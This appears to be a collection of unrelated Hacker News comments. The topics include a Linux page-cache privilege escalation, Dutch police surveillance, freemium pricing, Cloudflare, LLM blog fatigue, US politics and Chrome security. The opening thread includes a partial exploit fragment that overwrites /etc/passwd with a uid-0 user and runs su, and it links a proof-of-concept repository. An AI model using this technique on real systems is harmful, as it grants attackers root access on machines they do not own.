Eh, if you can pollute page caches this won’t safe you.

Think modifying shared libraries, ld preload, cron, I guess on some systems /etc/passwd even.

There are a lot of files readable that should definitely not be writable.

Fair enough -- a simpler change might be to poison /etc/passwd and call `su` to a user that has uid 0, since that requires no shell code nor a readable binary, and this seems to have worked in a slightly modified POC:

  f=g.open("/etc/passwd",0);
  e="rkeene:x:0:0:System administrator:/root:/run/current-system/sw/bin/bash\n".encode()
  ...
  g.system("/run/wrappers/bin/su - rkeene")

There is a PoC that does exactly that here: https://github.com/tgies/copy-fail-c

Well said.

Amsterdam Airport? Source?

Well, i don’t have a source. Its very hush hush, as even the part that the police is using it has been leaked by a redacted document. It’s crazy.

https://www.privacynieuws.nl/binnenlands-nieuws/politie-en-j...

Hm, ok, but you suspect that Amsterdam Airport (Schiphol Group I suppose) is using it?

If there’s something that screams late-stage capitalism any louder, I don’t want it…

What if they can’t protect your privacy, if they do not create a successful and sustainable business?

Why does STUN impact your QoS? I thought STUN was just for discovering your own external IP/port.

Makes me wonder.

Say 5% of the free tier users converts to a paying customer within 5 years. And user growth is constant. Then over time, you will get a much larger free tier user base, compared to your paying customers (in absolute numbers). At some point, it must become tempting to charge all free tier users a little bit to continue, because the group got so big, so there is a lot that can be earned there.

Is this wrong, or should we expect this?

Cloudflare still operates like this.

And they have become quite infamous for having aggressive sales tactics for anyone going over their internal metrics for the free tier (still under the public metrics for free).

If you’re going above those limits… come on lol.

Agree but also getting tired from all these blogs that state more or less the same thing about LLMs. I’ve read this before.

I could stand to hear less from both the enthusiasts and the detractors. My HN experience has changed substantially in the last couple of years.

I, and I believe many others, do hold him responsible for it.

However, I do not think starting there is a good idea: your progress in other areas would stall until that crook has been dealt with.

Like I’ve said a few times on HN, if you have 10 friends and ask them what they want to eat for dinner and 6 say “let’s go to a Mexican restaurants” and the other four say “let’s kill Bob and eat him”, it still tells you a lot about your friend group. It tells you even more of the person advocating eating Bob is made the leader of your group and decides where you are going to eat dinner for the next four years.

Especially after you have already seen what your friend has already done for four years

Ok, but how does that relate to what I stated exactly?

Because it doesn’t matter if you or even 60% of the population doesn’t approve of what Trump is doing - including posting a racist meme showing the Obamas as apes yesterday - this tells you about the country we live in

I fully agree that Chrome is spyware.

However, they do contribute to security: Chrome was first to implement Site Isolation, sandboxing too. These are essential security features for modern browsers. They are also not doing too bad with patching and security testing.